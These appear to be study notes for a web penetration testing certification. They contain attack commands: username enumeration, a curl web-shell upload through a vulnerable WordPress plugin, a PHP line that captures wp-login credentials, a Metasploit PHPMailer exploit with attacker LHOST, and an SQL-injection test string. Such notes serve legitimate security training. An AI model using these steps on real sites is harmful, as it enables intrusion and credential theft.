eWPT

elearnsecurity's Web Application Penetration Tester

Best resources for preparing:

  • THM Nahamstore https://tryhackme.com/room/nahamstore

  • THM Web Fundamentals Path

  • Portswigger's Web Security Academy https://portswigger.net/web-security

  • HackerOne https://www.hackerone.com/videos

Recon / subdomain and technology enumeration:

dnsenum -p 20 -s 100 --threads 5 cbs.com

./subbrute.py cbs.com

whatweb site.com -v

Username enumeration with patator:

patator http_fuzz url=http://userenumeration.site/login.php method=POST body='username=FILE0&password=FILE0' 0=/root/usernames.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'

Both fields take FILE0, so every candidate is tried as its own password; the -x ignore filter drops every response containing 'Invalid Username', so whatever is left is a username the application recognises (it answered with a different error, e.g. wrong password).

Work the Flow exploit

searchsploit work the flow
searchsploit worktheflow

Plugin enumeration: list wordpress/wp-content/plugins and read wordpress/wp-content/plugins/work-the-flow-file-upload/README.txt to confirm the installed version.

searchsploit -m exploits/php/webapps/36640.txt

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public-assets/jQuery-File-Upload-9.5.0/server/php/index.php

modify wp-login.php page (post-exploitation credential capture)

code insertion, right after the opening <?php tag (not before it: anything emitted before the tag is sent to the browser and breaks the login redirect with "headers already sent"):

file_put_contents('log.txt', file_get_contents('php://input'));

php://input is the raw POST body, so each login lands in log.txt as log=...&pwd=... . The file sits in the web root and is readable by anyone who guesses the name, and it is overwritten on every request, so treat this as a lab-only technique.

Simple Php Shell https://github.com/heisway/simple-php-shell

Prevent Clickjacking: send the anti-framing header before any output (the header() call must not be commented out, or it protects nothing):

<?php
header('X-Frame-Options: SAMEORIGIN');
?>

Modern browsers prefer the CSP frame-ancestors directive for the same purpose; when both are present, frame-ancestors wins and X-Frame-Options is ignored.
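Checking a target for this is quicker from the raw response than from the browser. The following is an added example, not code from the original notes: it parses constructed response heads (no real host was queried) and applies the browser rules above, including the case where a permissive frame-ancestors silently overrides a strict X-Frame-Options. The sample names and header values are assumptions.

```python
import re

# Constructed sample response heads (not captured from any real host), in the
# form a tester sees them in Burp's response view.
RESPONSES = {
    "unprotected": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>",
    "xfo": "HTTP/1.1 200 OK\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n<html>",
    "csp": "HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n\r\n",
    # DENY is present but CSP frame-ancestors takes precedence, so this one IS framable
    "csp_wildcard": "HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\nContent-Security-Policy: frame-ancestors *\r\n\r\n",
    "xfo_allowall": "HTTP/1.1 200 OK\r\nX-Frame-Options: ALLOWALL\r\n\r\n",
}


def parse_headers(raw):
    """Map lower-cased header names to values from a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def framing_protection(raw):
    """Return 'csp', 'xfo' or 'none' for a raw response.

    'none' is the clickjacking finding: the page can be framed by any origin.
    """
    h = parse_headers(raw)
    m = re.search(r"frame-ancestors\s+([^;]+)", h.get("content-security-policy", ""), re.I)
    if m:
        # With frame-ancestors present browsers ignore X-Frame-Options entirely,
        # so a wildcard source means framable even if XFO says DENY.
        return "none" if m.group(1).split() == ["*"] else "csp"
    xfo = h.get("x-frame-options", "").upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "xfo"
    # Missing header, ALLOWALL, or the obsolete ALLOW-FROM (ignored by current browsers)
    return "none"


def audit(responses):
    """Verdict per sample; every 'none' belongs in the report."""
    return {name: framing_protection(raw) for name, raw in responses.items()}


if __name__ == "__main__":
    for name, verdict in audit(RESPONSES).items():
        print(f"{name:14s} {verdict}")
```

Run it against saved Burp responses by replacing the constructed dict; anything reported as none is a finding, and the csp_wildcard case shows why the CSP header must be read before trusting X-Frame-Options.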

PhpMailer vuln: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

msfconsole:

search phpmailer
use exploit/multi/http/phpmailer_arg_injection
set RHOST <target>
set WEB_ROOT /var/www/html
set LHOST <attacker ip>
exploit
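The bug behind that module is worth understanding rather than just running: PHPMailer passed the user-supplied Sender to PHP's mail() as "-f<sender>", mail() ran it through escapeshellcmd() and then through a shell, and escapeshellcmd() leaves paired quotes alone while escaping the backslash inside them, so an RFC-quoted local part that passed e-mail validation turned into extra sendmail arguments (-X writes a transcript, including the mail body, to an attacker-chosen path). The block below is an added example, not the advisory's or PHPMailer's code: a Python model of escapeshellcmd() (ASCII subset, written here as an assumption about PHP's behaviour) plus shlex to stand in for /bin/sh, with the payload string from the advisory used as constructed input, beside the escapeshellarg()-style fix.

```python
import shlex

# Sender address from the advisory, used here as a constructed input. The local
# part is RFC-quoted, which is why it survives e-mail validation despite spaces.
PAYLOAD = '"attacker\\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'
SENDMAIL = "/usr/sbin/sendmail -t -i"   # PHP's default sendmail_path

# Characters PHP's escapeshellcmd() prefixes with a backslash; note the backslash itself.
_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def escapeshellcmd(s):
    """Model of PHP's escapeshellcmd(), which mail() applies to its extra-parameters
    argument. A quote is escaped only when it has no later partner, so paired quotes
    and the spaces between them pass through unchanged."""
    out, partner = [], None
    for i, c in enumerate(s):
        if c in _META:
            out.append('\\' + c)
        elif c in '"\'':
            nxt = s.find(c, i + 1)
            if partner is None and nxt != -1:
                partner = nxt                    # opening quote with a partner: kept
            elif partner is not None and c == s[partner]:
                partner = None                   # its closing partner: kept
            else:
                out.append('\\')                 # lone quote: escaped
            out.append(c)
        else:
            out.append(c)
    return ''.join(out)


def sendmail_argv(sender):
    """argv /bin/sh builds from the command mail() assembles for this Sender.
    The escaped backslash (\\\\) ends the double-quoted region early, so the
    following -oQ and -X become separate sendmail options."""
    return shlex.split(SENDMAIL + ' ' + escapeshellcmd('-f' + sender))


def sendmail_argv_fixed(sender):
    """Same, with the sender wrapped like escapeshellarg() (the PHPMailer fix):
    single quotes keep the whole address as one argument, whatever it contains."""
    return shlex.split(SENDMAIL + ' -f' + shlex.quote(sender))


if __name__ == "__main__":
    print("escaped:", escapeshellcmd('-f' + PAYLOAD))
    print("argv   :", sendmail_argv(PAYLOAD))        # -oQ/tmp/ and -X/... split out
    print("fixed  :", sendmail_argv_fixed(PAYLOAD))  # a single -f argument
```

The vulnerable path yields seven arguments, the fixed path four; any test payload that needs spaces has to keep them inside a quoted local part for exactly this reason.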

SWF Investigator (Adobe's tool for analysing Flash .swf files)

Web services: request the WSDL (soapexample.com/WS.php?wsdl) to enumerate the SOAP endpoint, its operations and their parameters, then test every parameter like any other input.
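Reading a WSDL by hand is slow; the following added example (not code from the original notes) does the enumeration offline on a constructed WSDL 1.1 document whose service, operation and parameter names are assumptions standing in for what WS.php?wsdl might return, then builds a SOAP 1.1 request for one operation ready to paste into Burp Repeater.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"wsdl": "http://schemas.xmlsoap.org/wsdl/",
      "soap": "http://schemas.xmlsoap.org/wsdl/soap/"}

# Constructed WSDL 1.1 document; the host, service and operations are assumptions.
SAMPLE_WSDL = """<definitions name="WS" targetNamespace="urn:WS"
    xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:tns="urn:WS"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <message name="LoginRequest">
    <part name="username" type="xsd:string"/><part name="password" type="xsd:string"/>
  </message>
  <message name="LoginResponse"><part name="token" type="xsd:string"/></message>
  <message name="GetUserRequest"><part name="id" type="xsd:int"/></message>
  <message name="GetUserResponse"><part name="user" type="xsd:string"/></message>
  <portType name="WSPortType">
    <operation name="Login"><input message="tns:LoginRequest"/><output message="tns:LoginResponse"/></operation>
    <operation name="GetUser"><input message="tns:GetUserRequest"/><output message="tns:GetUserResponse"/></operation>
  </portType>
  <binding name="WSBinding" type="tns:WSPortType">
    <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="Login"><soap:operation soapAction="urn:WS#Login"/></operation>
    <operation name="GetUser"><soap:operation soapAction="urn:WS#GetUser"/></operation>
  </binding>
  <service name="WSService">
    <port name="WSPort" binding="tns:WSBinding">
      <soap:address location="http://soapexample.com/WS.php"/>
    </port>
  </service>
</definitions>"""


def parse_wsdl(text):
    """Return the SOAP endpoint(s) and, per operation, its input parameters and SOAPAction."""
    root = ET.fromstring(text)
    messages = {m.get("name"): [(p.get("name"), p.get("type") or p.get("element"))
                                for p in m.findall("wsdl:part", NS)]
                for m in root.findall("wsdl:message", NS)}
    ops = {}
    for op in root.findall("wsdl:portType/wsdl:operation", NS):
        inp = op.find("wsdl:input", NS)
        msg = inp.get("message").split(":")[-1] if inp is not None else ""
        ops[op.get("name")] = {"params": messages.get(msg, []), "soapAction": ""}
    for op in root.findall("wsdl:binding/wsdl:operation", NS):
        so = op.find("soap:operation", NS)
        if so is not None and op.get("name") in ops:
            ops[op.get("name")]["soapAction"] = so.get("soapAction", "")
    endpoints = [a.get("location") for a in root.iter("{%s}address" % NS["soap"])]
    return {"endpoints": endpoints, "targetNamespace": root.get("targetNamespace", ""),
            "operations": ops}


def build_request(info, op_name, values):
    """SOAP 1.1 (headers, body) for one operation; every declared parameter gets a
    value from `values`, so each one can be fuzzed in turn. Values are XML-escaped."""
    op = info["operations"][op_name]
    parts = "".join("<%s>%s</%s>" % (n, escape(str(values.get(n, ""))), n)
                    for n, _ in op["params"])
    body = ('<?xml version="1.0"?>'
            '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
            'xmlns:tns="%s"><soapenv:Body><tns:%s>%s</tns:%s></soapenv:Body></soapenv:Envelope>'
            % (info["targetNamespace"], op_name, parts, op_name))
    headers = {"Content-Type": "text/xml; charset=utf-8",
               "SOAPAction": '"%s"' % op["soapAction"]}
    return headers, body


if __name__ == "__main__":
    info = parse_wsdl(SAMPLE_WSDL)
    print("endpoints:", info["endpoints"])
    for name, op in info["operations"].items():
        print(name, op["soapAction"], op["params"])
    hdrs, body = build_request(info, "Login", {"username": "admin' OR 1=1-- ", "password": "x"})
    print(hdrs, body, sep="\n")
```

Against a live target, replace SAMPLE_WSDL with the fetched document; the operation list is the attack surface, and each part name is a parameter to inject into.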

Chaining vulns: e.g. three vulnerabilities (a path traversal, an SSRF in an external piece of software, and a post-authentication RCE) chained into a full pre-auth RCE. Individually each is a medium; together they are critical, which is the impact the report should rate.

Report Want the report to be:

  • Exhaustive

  • Clear

  • Good Looking

  • On-time

  • Adhering to goals

Report structure: Executive Summary --> Vulnerability Report --> Remediation Report

Intro for the Executive Summary:

The purpose of this assessment and report is to identify any web application issues that could affect ABC application and the web server hosting it, and to provide solutions to remedy these same issues. Use Graphs, Charts, stats and tables. Text should only be used to explain charts and give final estimation on the state of security.

Resources to train: THM Web Fundamentals Path https://portswigger.net/web-security/all-labs https://tryhackme.com/room/nahamstore

Virtual host fuzzing: wfuzz -c -z file,/usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u "http://nahamstore.thm/" -H "Host: FUZZ.nahamstore.thm" --hw 65

--hw 65 hides every response with 65 words, the default page the server returns for an unknown Host value. Request a bogus hostname first to learn that baseline word count, then filter on it so only vhosts that answer differently remain.

Burp Suite Scanner - issue definitions with their ratings

What can Burp help me with?

DanielMiessler SecLists

when to Fuzz?

  • Do not rely on any automated tools

  • Take good notes

  • to have Knowledge about chaining vulnerabilities together - in order to achieve greater impact

  • test ALL the parameters, the attack point can be in the most unexpected place

  • Do not forget to include PoC, CVSS scoring and mitigation recommendations in the report

Flash, CORS, and the NoSQL databases are not relevant for the exam. Of those three it's probably still a good idea to invest some time into CORS, and a little of NoSQL databases.
